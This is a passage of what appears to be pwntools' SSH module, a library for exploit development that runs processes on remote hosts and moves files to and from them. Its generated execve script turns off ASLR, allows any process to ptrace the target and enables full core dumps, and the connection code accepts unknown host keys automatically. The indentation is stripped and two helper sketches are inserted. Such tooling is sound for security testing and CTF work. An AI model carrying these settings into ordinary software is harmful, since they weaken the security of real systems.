config_file = os.path.expanduser('~/.ssh/config')
if not ignore_config and os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(open(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not user and 'user' in host_config:
self.user = user = host_config['user']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if not ignore_config:
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = bool(proxy_sock or proxy_command)
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
else:
proxy_sock = None
try:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, allow_agent=ssh_agent, compress=True, sock=proxy_sock, look_for_keys=not ignore_config)
except paramiko.BadHostKeyException as e:
self.error("Remote host %(host)s is using a different key than stated in known_hosts\n"
" To remove the existing entry from your known_hosts and trust the new key, run the following commands:\n"
" $ ssh-keygen -R %(host)s\n"
" $ ssh-keygen -R [%(host)s]:%(port)s" % locals())
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
if self.sftp:
with context.quiet:
self.cwd = packing._decode(self.pwd())
else:
self.cwd = '.'
with context.local(log_level='error'):
def getppid():
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
def __repr__(self):
return "{}(user={!r}, host={!r})".format(self.__class__.__name__, self.user, self.host)
@property
def cwd(self):
return self._cwd
@cwd.setter
def cwd(self, cwd):
self._cwd = cwd
if self.sftp:
self.sftp.chdir(cwd)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline(b'echo Hello; exit')
>>> print(b'Hello' in sh.recvall())
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=(), raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline(b'echo Hello; exit')
>>> sh.recvall()
b'Hello\n'
>>> s.process(['/bin/echo', b'\xff']).recvall()
b'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall() # doctest: +ELLIPSIS
b'.../bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall() # doctest: +ELLIPSIS
b'.../bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
b'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> str(sh.pid).encode() in s.pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
b'/tmp\n'
>>> p = s.process(['python','-c','import os; os.write(1, os.read(2, 1024))'], stderr=0)
>>> p.send(b'hello')
>>> p.recv()
b'hello'
>>> s.process(['/bin/echo', 'hello']).recvall()
b'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
b''
>>> s.process(['/usr/bin/env'], env={}).recvall()
b''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
b'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print(s.process('false', preexec_fn=uses_globals).recvall().strip().decode()) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
b'hello\n'
>>> io = s.process(['cat'], timeout=5)
>>> io.recvline()
b''
"""
if not argv and not executable:
self.error("Must specify argv or executable")
aslr = aslr if aslr is not None else context.aslr
argv, env = misc.normalize_argv_env(argv, env, self)
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = [bytearray(b'/bin/sh'), bytearray(b'-c')] + argv
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, (six.text_type, six.binary_type, bytearray)):
self.error("executable / argv[0] must be a string: %r" % executable)
executable = bytearray(packing._need_bytes(executable, min_wrong=0x80))
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
try:
integer_types = int, long
except NameError:
integer_types = int,
exe = bytes(%(executable)r)
argv = [bytes(a) for a in %(argv)r]
env = %(env)r
os.chdir(%(cwd)r)
environ = getattr(os, 'environb', os.environ)
if env is not None:
env = OrderedDict((bytes(k), bytes(v)) for k,v in env)
os.environ.clear()
environ.update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = environ.get(b'PATH',b'').split(os.pathsep.encode())
if os.path.sep.encode() not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{!r} is not executable or does not exist in $PATH: {!r}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
getattr(sys.stdout, 'buffer', sys.stdout).write(os.path.realpath(exe) + b'\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
os.close(fd)
elif isinstance(newfd, (str, bytes)):
newfd = os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
os.dup2(newfd, fd)
os.close(newfd)
elif isinstance(newfd, integer_types) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
%(func_name)s(*%(func_args)r)
os.execve(exe, argv, env)
""" % locals() # """
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
if timeout == Timeout.default:
timeout = self.timeout
with self.progress(msg) as h:
script = 'echo PWNTOOLS; for py in python3 python2.7 python2 python; do test -x "$(which $py 2>&1)" && echo $py && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.quiet:
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=timeout)
try:
python.recvline_contains(b'PWNTOOLS') # Magic flag so that any sh/bash initialization errors are swallowed
python.recvline() # Python interpreter that was selected
result = safeeval.const(python.recvline()) # Status flag from the Python script
except (EOFError, ValueError):
h.failure("Process creation failed")
self.warn_once('Could not find a Python interpreter on %s\n' % self.host
+ "Use ssh.run() instead of ssh.process()\n"
"The original error message:\n"
+ python.recvall().decode())
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = packing._decode(python.recvuntil(b'\x00')[:-1])
h.success('pid %i' % python.pid)
if not aslr and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
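# Hedged sketch (not part of pwntools): the generated script above resolves a
# bare executable name against $PATH exactly like the snippet below before
# calling os.execve(). Paths in the usage note are illustrative.
def _resolve_on_path(exe, path_env):
    import os
    def is_exe(p):
        return os.path.isfile(p) and os.access(p, os.X_OK)
    if os.path.sep in exe or is_exe(exe):
        return exe
    for d in path_env.split(os.pathsep):
        candidate = os.path.join(d, exe)
        if is_exe(candidate):
            return candidate
    return None
# _resolve_on_path('sh', '/usr/bin:/bin') -> '/bin/sh' on most Linux systems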
def which(self, program):
"""which(program) -> str
Works like invoking ``which`` on the remote system, except that the
current working directory is appended to ``$PATH`` first.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip().decode()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> py = s.run('python -i')
>>> _ = py.recvuntil(b'>>> ')
>>> py.sendline(b'print(2+2)')
>>> py.sendline(b'exit')
>>> print(repr(py.recvline()))
b'4\n'
>>> s.system('env | grep -a AAAA', env={'AAAA': b'\x90'}).recvall()
b'AAAA=\x90\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except ValueError:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(s.run_to_end('echo Hello; exit 17'))
(b'Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme')
>>> a = s.connect_remote(s.host, l.lport)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s['echo hello']))
b'hello'
"""
return self.run(attr).recvall().strip()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s('echo hello')))
b'hello'
"""
return self.run(attr).recvall().strip()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> s.echo('hello')
b'hello'
>>> s.whoami()
b'travis'
>>> s.echo(['huh','yay','args'])
b'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
@LocalContext
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr]
command.extend(args[0])
else:
command = [attr]
command.extend(args)
command = b' '.join(packing._need_bytes(arg, min_wrong=0x80) for arg in command)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(packing._decode(data))
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace(b'(stdin)= ',b'')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace(b'-',b'').strip()
if not isinstance(data, str):
data = data.decode('ascii')
return data
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
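# Hedged sketch (not part of pwntools): the cache check above compares a
# hex-encoded SHA-256 of the cached file against the fingerprint reported by
# the remote host. hashes.sha256filehex() is roughly equivalent to:
def _sha256filehex_demo(path):
    import hashlib
    h = hashlib.sha256()
    with open(path, 'rb') as fd:
        for chunk in iter(lambda: fd.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()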
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.failure("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = b''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'wb') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
if not hasattr(remote, 'encode'):
remote = remote.decode('utf-8')
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.error('Could not download file %r' % remote)
return local
def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with open('/tmp/bar','w+') as f:
... _ = f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... cache=False)
>>> s.download_data('/tmp/bar')
b'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
b'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p), 'rb') as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(remote),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme')
>>> s.upload_data(b'Hello, world', '/tmp/upload_foo')
>>> print(open('/tmp/upload_foo').read())
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data(b'Hello, world', '/tmp/upload_bar')
>>> print(open('/tmp/upload_bar').read())
Hello, world
"""
data = packing._need_bytes(data)
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote is None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename, 'rb') as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg):
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to upload.
remote(str): Remote path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
with self.system('test -d ' + sh_string(file_or_directory)) as io:
is_dir = io.wait()
if 0 == is_dir:
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specifies where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = packing._decode(self.readlink('-f',remote).strip())
libs[remote] = 0
if directory is None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
This uses ``mktemp -d`` under the covers and sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme')
>>> cwd = s.set_working_directory()
>>> s.ls()
b''
>>> packing._decode(s.pwd()) == cwd
True
>>> s = ssh(host='example.pwnme')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == b''
>>> _=s.set_working_directory(homedir)
>>> assert b'foo' in s.ls().split(), s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert b'foo' in s.ls().split(), s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,b'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert b'foo' in s.ls().split(), s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, (six.binary_type, six.text_type)):
symlink = os.path.join(self.pwd(), b'*')
if not hasattr(symlink, 'encode') and hasattr(symlink, 'decode'):
symlink = symlink.decode('utf-8')
if not wd:
